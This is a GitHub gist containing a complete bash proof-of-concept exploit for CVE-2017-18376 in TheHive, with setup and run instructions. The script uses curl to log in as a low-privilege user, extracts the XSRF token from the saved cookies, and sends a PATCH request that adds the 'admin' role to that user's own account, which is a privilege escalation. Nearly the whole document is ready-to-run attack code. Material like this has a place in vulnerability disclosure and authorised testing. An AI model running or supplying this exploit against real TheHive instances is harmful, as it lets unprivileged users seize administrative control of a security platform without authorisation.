Skip to content

Instantly share code, notes, and snippets.

@RaJiska
Created June 19, 2019 09:25
Show Gist options
  • Save RaJiska/c1b4521aefd77ed43b06045ca05e2591 to your computer and use it in GitHub Desktop.
Save RaJiska/c1b4521aefd77ed43b06045ca05e2591 to your computer and use it in GitHub Desktop.
Exploit for CVE-2017-18376
#! /bin/bash
# Author:
# Doriann "Ra'Jiska" Corlouër
# Description:
# Exploit POC for CVE-2017-18376 - https://nvd.nist.gov/vuln/detail/CVE-2017-18376
# This POC allow a TheHive user with minimal rights (read, read / write) to gain admin rights (privilege escalation)
# Setup:
# Edit the following variables:
# - THEHIVE_ROOT_URL => The URL of your TheHive instance
# - USERNAME => The username of your unprivileged account
# - PASSWORD => The password of your unprivileged account
# Execution:
# $ bash thehiveprivesc.sh
THEHIVE_ROOT_URL="https://somelink.com/thehive"
USERNAME="username"
PASSWORD="password"
COOKIE="$(/bin/mktemp --suffix=_thehivecookie)"
CURL="/usr/bin/curl -v -c $COOKIE -b $COOKIE"
$CURL $THEHIVE_ROOT_URL # Retrieve CSRF
$CURL $THEHIVE_ROOT_URL/api/login --data "{\"user\":\"$USERNAME\",\"password\":\"$PASSWORD\"}" -H 'Content-Type: application/json;charset=utf-8'
XSRF_TOKEN=$(/bin/cat $COOKIE |/bin/grep 'XSRF-TOKEN' |/usr/bin/awk {'$1=$2=$3=$4=$5=$6=""; print $0'} |/usr/bin/awk {'print $1'}) # Retrieve saved CSRF for header
$CURL -X PATCH $THEHIVE_ROOT_URL/api/user/$USERNAME --data '{"roles":["read","write","admin"]}' -H "X-XSRF-TOKEN: $XSRF_TOKEN" -H 'Content-Type: application/json;charset=utf-8'
/bin/rm -f $COOKIE
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment